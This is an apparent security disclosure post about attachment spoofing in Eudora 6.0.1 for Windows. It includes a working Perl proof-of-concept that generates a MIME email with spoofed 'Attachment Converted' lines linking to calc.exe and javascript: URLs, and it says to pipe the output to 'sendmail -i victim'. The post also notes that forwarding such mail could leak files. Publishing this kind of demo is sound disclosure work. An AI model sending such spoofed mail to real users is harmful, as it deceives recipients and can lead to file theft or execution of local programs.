Eudora 6.0.1 for Windows was released recently. The buffer overflow (and code execution) with long spoofed attachment names seems to be fixed; the spoofing itself is not, though it was known for years. Spoofing demo (essentially identical to 6.0 version) below. Cheers, Paul Szabo - School of Mathematics and Statistics University of Sydney 2006 Australia --- #!/usr/bin/perl -- use MIME::Base64; print "From: me\n"; print "To: you\n"; print "Subject: Eudora 6.0 on Windows spoof\n"; print "MIME-Version: 1.0\n"; print "Content-Type: multipart/mixed; boundary=\"zzz\"\n"; print "\n"; print "This is a multi-part message in MIME format.\n"; print "--zzz\n"; print "Content-Type: text/plain\n"; print "Content-Transfer-Encoding: 7bit\n"; print "\n"; print "Pipe the output of this script into: sendmail -i victim\n"; print "\nQuestion: Besides In.mbx, Eudora 6.0.1 also keeps In.mbx.001 and In.mbx.002 files. Any way to turn this wasteful feature off?\n"; print "\nWith spoofed attachments, we could 'steal' files if the message was forwarded (not replied to).\n"; print "\nWithin plain-text email (or plain-text, inline MIME parts) embedded CR=x0d characters get converted internally into a NUL=x00 and ignored, so we can spoof \"attachment converted\" lines:\n"; print "\nThe following work fine (but are boring and/or put up warnings):\n"; print "Attachment Converted\r: \"c:\\winnt\\system32\\calc.exe\"\n"; print "Attachment Converted\r: c:\\winnt\\system32\\calc.exe\n"; print "(Note how JavaScript is done with IE, web with default browser Netscape)\n"; print "Attachment Converted\r: <A href=javascript:alert(%27hello%27)>hello.txt</a>\n"; print "Attachment Converted\r: <A href=>web.txt</a>\n"; print "Attachment Converted\r: <A href=c:/winnt/system32/calc.exe>file.txt</a>\n"; print "\nIf we can guess the full path to the attach directory then can change the name shown to anything we like, but get broken icon:\n"; print "Attachment Converted\r: <A href=H:/windows/.eudora/attach/calc>file.txt</a>\n"; print "\nCuteness value only:\n"; print "Attachment Converted\r: <A href=c:/winnt/system32/calc.exe>file1.txt</a> xyz <A href=c:/winnt/system32/calc.exe>file2.txt</a>\n"; print "\n<x-html> With <b>HTML</b> <i>inclusions</i> we can do <a href=c:/winnt/system32/calc.exe>file</a>, <a href=\"\">http</a> and <a href=\"javascript:alert(\x27hello\x27)\">javascript</a> references. Any way to exploit this? </x-html>\n"; print "\n<x-rich> Can also do RTF inclusions. Can this be abused? </x-rich>\n"; print "\nThose <x-xyz></x-xyz> constructs allow spoofing attachments easily, without embedded CR:\n\n"; print "HTML\n"; print "<x-html></x-html>Attachment Converted: \"xyz\"\n"; print "Rich\n"; print "<x-rich></x-rich>Attachment Converted: \"xyz\"\n"; print "Flowed\n"; print "<x-flowed></x-flowed>Attachment Converted: \"xyz\"\n"; print "\n"; print "\n--zzz\n"; print "Content-Type: text/plain; name=\"plain.txt\"\n"; print "Content-Transfer-Encoding: 7bit\n"; print "Content-Disposition: inline; filename=\"plain.txt\"\n"; print "\n"; print "Within a 'plain' attachment:\n"; print "Attachment Converted\r: \"c:\\winnt\\system32\\calc.exe\"\n"; print "\n--zzz\n"; print "Content-Type: text/plain; name=\"qp.txt\"\n"; print "Content-Transfer-Encoding: quoted-printable \n"; print "Content-Disposition: inline; filename=\"qp.txt\"\n"; print "\n"; print "Within quoted-printable encoded parts still need the embedded CR:\n"; print "=41ttachment=20=43onverted\r=3a \"c:\\winnt\\system32\\calc.exe\"\n"; print "\n--zzz\n"; print "Content-Type: text/plain; name=\"b64.txt\"\n"; print "Content-Transfer-Encoding: base64\n"; print "Content-Disposition: inline; filename=\"b64.txt\"\n"; print "\n"; $z = "Within base64 encoded (plain-text, inline) MIME parts, can spoof\r without embedded CR (but line termination is CR-NL):\r Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\r\n"; print encode_base64($z); print "\n--zzz--\n"; print "\n";